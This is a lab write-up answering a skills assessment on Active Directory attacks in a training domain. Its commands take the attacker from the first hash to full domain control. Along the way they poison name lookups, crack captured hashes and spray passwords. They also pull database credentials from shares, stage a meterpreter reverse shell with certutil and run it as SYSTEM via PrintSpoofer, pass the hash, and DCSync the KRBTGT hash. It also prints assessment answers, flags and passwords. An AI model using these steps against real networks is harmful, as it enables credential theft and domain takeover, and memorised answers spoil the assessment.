FaresMorcy
AD Enumeration & Attacks - Skills Assessment Part II


Last updated 8 days ago

Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Let's begin by starting Responder with its default settings on the internal interface, ens224. Responder answers LLMNR, NBT-NS and mDNS lookups for names that do not resolve, and any client that then tries to authenticate to it hands us a NetNTLMv2 challenge/response.

sudo responder -I ens224

Responder writes captured hashes to one file per protocol and source host under /usr/share/responder/logs/. Let's review the log for the SMB client at 172.16.7.3 (DC01) to see whether a hash was captured.

cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt

Answer: AB920

Q2) What is this user's cleartext password?

Let's save the captured line to a file and crack it with Hashcat. Mode 5600 is NetNTLMv2, which is what Responder's SSP capture produces; the whole user::DOMAIN:challenge:response:blob line goes in unchanged.

hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt

Answer: weasal

Q3) Submit the contents of the C:\flag.txt file on MS01.

Let's first check which hosts are alive in the domain network. With fping, -a prints only the alive hosts, -g generates the targets from the CIDR range, -q suppresses per-probe output and -s prints summary statistics at the end.

fping -asgq 172.16.7.0/23

Let's save the live IP addresses to a file and run Nmap against them with service and OS detection (-A), which also reveals hostnames so we can identify MS01.

sudo nmap -v -A -iL hosts.txt

  • 172.16.7.3: DC01
  • 172.16.7.50: MS01
  • 172.16.7.60: SQL01
  • 172.16.7.240: our Parrot attack host

Let's verify whether ab920 can authenticate to 172.16.7.50 over SMB and WinRM. A successful WinRM login means we can get a remote PowerShell session with Evil-WinRM; over SMB, CrackMapExec only marks the host Pwn3d! when the account is a local administrator, so a plain [+] tells us the credentials are valid but unprivileged.

crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal'
crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal'

Let's use Evil-WinRM to open a PowerShell session on MS01 as ab920 and read C:\flag.txt.

evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal'

Answer: aud1t_gr0up_m3mbersh1ps!

Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

Now let's build a list of domain users to target with a password spray. With valid credentials, CrackMapExec can pull every user from the DC along with each account's badPwdCount and description.

sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt
grep 'badpwdcount' usernames.txt | cut -d'\' -f2 | awk '{print $1}' | sort -u > valid_users.txt

The grep keeps only the per-user lines, so the banner and the [+] login line (which would otherwise end up in the list as SMB and ab920:weasal) are dropped before the DOMAIN\ prefix is cut away. We now have 2,904 valid usernames in the domain. Before spraying, check the domain's lockout policy: one password tried once against every account is safe only while a single failed attempt per user stays under the lockout threshold. Let's proceed with the spray using a common weak password.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

Answer: BR086

Q5) What is this user's password?

Answer: Welcome1

Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

Let's perform share enumeration to identify any shared resources on which we may have read access.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

The output lists a share named Department Shares that we can read. Let's recursively list its contents.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

The listing includes a web.config file, a common place for IIS applications to store database connection strings. Let's download it (-A pulls every file whose name matches the pattern) and review its contents.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config

Answer: D@ta_bAse_adm1n!
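Connection strings are the usual payoff from a share crawl, and a share the size of Department Shares will often hold more than one config file. As an added example (not from the original page), the bash function below extracts every connectionString attribute from a web.config, splits it into key=value pairs and prints server, user and password, flagging entries that use Windows integrated authentication instead (those carry no password to reuse). The web.config embedded here is constructed; the password in it is a placeholder, not the lab's.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough.
# Pulls database credentials out of ASP.NET web.config connection strings.

# Constructed web.config fragment; the password value is a placeholder.
WEBCONFIG_SAMPLE='<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <connectionStrings>
    <add name="InventoryDb"
         connectionString="Server=SQL01.inlanefreight.local;Database=inventory;User Id=netdb;Password=S4mpl3_Only!;"
         providerName="System.Data.SqlClient" />
    <add name="ReportsDb"
         connectionString="Data Source=(local);Initial Catalog=reports;Integrated Security=SSPI;"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>'

# connstr_creds
#   Reads a web.config on stdin and prints one tab-separated line per
#   connection string: server, user and password. Strings that rely on
#   Integrated Security (Windows auth) carry no reusable secret, so they
#   are reported with "(windows auth)" instead of a user and "-" as password.
connstr_creds() {
  grep -oi 'connectionString="[^"]*"' |
  sed 's/^[^"]*"//; s/"$//' |
  awk -F';' '
    {
      host = ""; user = ""; pass = ""; integrated = 0
      for (i = 1; i <= NF; i++) {
        eq = index($i, "=")
        if (eq == 0) continue                      # empty trailing field
        key = tolower(substr($i, 1, eq - 1))
        gsub(/^ +| +$/, "", key)
        val = substr($i, eq + 1)
        if (key == "server" || key == "data source" || key == "address")
          host = val
        else if (key == "user id" || key == "uid" || key == "user")
          user = val
        else if (key == "password" || key == "pwd")
          pass = val
        else if (key == "integrated security" && tolower(val) != "false")
          integrated = 1
      }
      if (pass != "")      print host "\t" user "\t" pass
      else if (integrated) print host "\t(windows auth)\t-"
    }'
}

# Usage against the sample; on an engagement: connstr_creds < web.config
printf '%s\n' "$WEBCONFIG_SAMPLE" | connstr_creds
```

Point it at every web.config, app.config or appsettings-style file the smbmap crawl brought back; a SQL login that appears in several applications is a strong hint the same password is reused elsewhere.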

Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

Next, we use the netdb credentials from web.config to connect to SQL01 with Impacket's mssqlclient. If the login is rejected, retry with -windows-auth, which sends the domain credentials over NTLM instead of as a SQL login.

python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60

We have successfully authenticated to SQL01; however, we do not yet have the permissions needed to read the flag. Let's run a command on the host through xp_cmdshell and review the privileges of the SQL Server service account. If xp_cmdshell is disabled, mssqlclient's enable_xp_cmdshell helper turns it on (this needs sysadmin rights on the instance).

EXEC xp_cmdshell 'whoami /priv'

The service account holds SeImpersonatePrivilege. This is not PrintNightmare; it is the classic token-impersonation path: PrintSpoofer coerces the local Print Spooler into connecting to a named pipe we control and impersonates the resulting SYSTEM token, which works for any account holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

Let's generate a reverse-shell payload with msfvenom and grab PrintSpoofer.exe, then stage both from a web server listening on port 8000 on our Parrot host so SQL01 can pull them with certutil.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe

Next, let's download the two files onto SQL01 through xp_cmdshell.

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe"

Let's start the Meterpreter handler in msfconsole as a background job, then trigger PrintSpoofer from the mssqlclient session so that shell.exe runs as SYSTEM.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 1335
run -j

Back in the mssqlclient session:

xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe

Once the SYSTEM session checks in, drop to a command prompt (shell) in Meterpreter and retrieve the flag.

more C:\Users\administrator\Desktop\flag.txt

Answer: s3imp3rs0nate_cl@ssic

Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

We now have SYSTEM on SQL01, so the next step is to dump the local SAM for the Administrator account's NTLM hash. Load the kiwi (Mimikatz) extension in the x64 Meterpreter session and dump the SAM; creds_all would additionally show the credentials of any logged-on users.

load kiwi
lsa_dump_sam

The local Administrator password appears to be reused on MS01, so we can pass the NTLM hash straight to Evil-WinRM (-H) without cracking it and read the flag from the Administrator desktop.

evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

Answer: exc3ss1ve_adm1n_r1ights!

Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Let's download PowerView.ps1 to MS01 and enumerate the ACL on the Domain Admins group. Its SID ends in the well-known RID 512; -ResolveGUIDs turns extended-right GUIDs into readable names.

certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUIDs

This fails from the Evil-WinRM session, so let's instead get a Meterpreter session on MS01 with the psexec module, authenticating with the Administrator hash (the 32 zeros are the blank LM half), and load PowerView from there.

use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit

In the new session, Meterpreter's powershell extension can import a script from our attack host (PowerView.ps1 is assumed to sit in the directory we are serving from) and open an interactive PowerShell prompt:

load powershell
powershell_import PowerView.ps1
powershell_shell
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUIDs

Let's keep only the entries that grant GenericAll and show who holds them.

Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match 'GenericAll' } | Select-Object SecurityIdentifier, ActiveDirectoryRights

Next, let's convert the security identifier (SID) from that entry to a username (newer PowerView builds name this function ConvertFrom-SID).

Convert-SidToName "S-1-5-21-3327542485-274640656-2609762496-4611"

Answer: CT059

Q10) Crack this user's password hash and submit the cleartext password as your answer.

For this task we run Inveigh on MS01, where we are a local administrator, to spoof LLMNR and NBNS responses on the internal segment and capture the NetNTLMv2 hash of CT059 when that account tries to reach a name that does not resolve.

certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y -FileOutput Y

With -FileOutput Y the captures are also written to Inveigh-NTLMv2.txt in the working directory, in the same user::DOMAIN:challenge:response:blob format Responder uses.

Let's save the captured CT059 line to a file and crack it with Hashcat, again in NetNTLMv2 mode.

hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt

Answer: charlie1
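Both captures on this page (Responder for ab920 in Q1 and Inveigh for CT059 here) produce the same user::DOMAIN:challenge:response:blob lines, and a capture that runs for a while logs the same account several times with different challenges, plus machine accounts whose long random passwords never crack. As an added example (not from the original walkthrough), the bash function below prepares a hashcat -m 5600 input from such a log: it rejects malformed lines, drops machine accounts and keeps one structurally valid capture per account. The capture lines embedded here are constructed; the hex values are not real hashes.

```bash
#!/usr/bin/env bash
# Added example, not from the original walkthrough.
# Deduplicates and sanity-checks Responder/Inveigh NetNTLMv2 captures
# before handing them to hashcat -m 5600.

# Constructed capture lines (user::DOMAIN:server_challenge:NTProofStr:blob).
# The hex values are made up and will not crack to anything.
CAPTURE_SAMPLE='ab920::INLANEFREIGHT:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d2010123456789abcdef00000000020008004e0054004c004d000000
AB920::INLANEFREIGHT:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000c0653150de09d20189abcdef0123456700000000020008004e0054004c004d000000
ct059::INLANEFREIGHT:0f0e0d0c0b0a0908:abcdefabcdefabcdefabcdefabcdefab:0101000000000000c0653150de09d201aabbccddeeff001100000000020008004e0054004c004d000000
DC01$::INLANEFREIGHT:aabbccddeeff0011:0123456789abcdef0123456789abcdef:0101000000000000c0653150de09d201deadbeefdeadbeef00000000020008004e0054004c004d000000
broken::INLANEFREIGHT:1234:zz:notahash'

# ntlmv2_unique
#   Reads capture lines on stdin and writes a hashcat -m 5600 input file.
#   Field layout after splitting on ":" is user, (empty), domain, challenge,
#   NTProofStr, blob. Lines with the wrong field count, a challenge that is
#   not 16 hex chars or an NTProofStr that is not 32 hex chars are reported
#   on stderr and skipped. Machine accounts (user ends in $) are dropped, and
#   only the first capture per user@domain is kept (case-insensitive).
ntlmv2_unique() {
  awk -F: '
    function ishex(s) { return s ~ /^[0-9a-fA-F]+$/ }
    NF != 6 || length($4) != 16 || !ishex($4) || length($5) != 32 || !ishex($5) || !ishex($6) {
      print "skipping malformed line: " $0 > "/dev/stderr"
      next
    }
    $1 ~ /\$$/ { next }                          # machine account
    {
      key = tolower($1 "@" $3)
      if (!(key in seen)) { seen[key] = 1; print }
    }'
}

# Usage: write the cleaned list and crack it.
#   ntlmv2_unique < Inveigh-NTLMv2.txt > ntlmv2.txt
#   hashcat -m 5600 ntlmv2.txt /usr/share/wordlists/rockyou.txt
printf '%s\n' "$CAPTURE_SAMPLE" | ntlmv2_unique
```

One capture per account is all hashcat needs: the password is the same regardless of the challenge, so cracking duplicates only multiplies the runtime.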

Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

CT059 holds GenericAll over Domain Admins, so we can add that account to the group and then use it to reach DC01.

The Parrot attack host is reachable only over SSH, so the RDP client has to run on the machine we SSH from and be tunnelled in. On that machine, set /etc/proxychains.conf to use a SOCKS4 proxy on 127.0.0.1 port 9050 (the stock proxychains configuration already ends with that line).

sudo nano /etc/proxychains.conf

Next, open an SSH connection to the attack host that also creates a SOCKS proxy on local port 9050.

ssh -D 9050 htb-student@10.129.221.33

Now authenticate to MS01 over RDP through the tunnel as CT059.

proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,/home/htb-ac-1224655/

Let's add the account to Domain Admins (double quotes so the group name survives cmd.exe).

net group "Domain Admins" ct059 /add /domain

Group membership is only reflected in tokens issued after the change, so rather than reuse the RDP session's token we authenticate explicitly as CT059 again and open a PowerShell Remoting session on DC01, then read the flag from the Administrator desktop.

$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force))
Enter-PSSession -ComputerName DC01 -Credential $cred

Answer: acLs_f0r_th3_w1n!

Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

Finally, let's perform a DCSync as the new Domain Admin to pull the KRBTGT NTLM hash. Here we do it from a psexec.py shell on DC01 with Mimikatz, which first has to be copied to the host (step not shown):

psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3
lsadump::dcsync /user:inlanefreight\krbtgt

The same result is available without touching disk on the DC: Impacket's secretsdump.py issues the replication request from the attack host, for example with -just-dc-user krbtgt against 172.16.7.3 using the CT059 credentials.

Answer: 7eba70412d81c1cd030d72a3e8dbe05f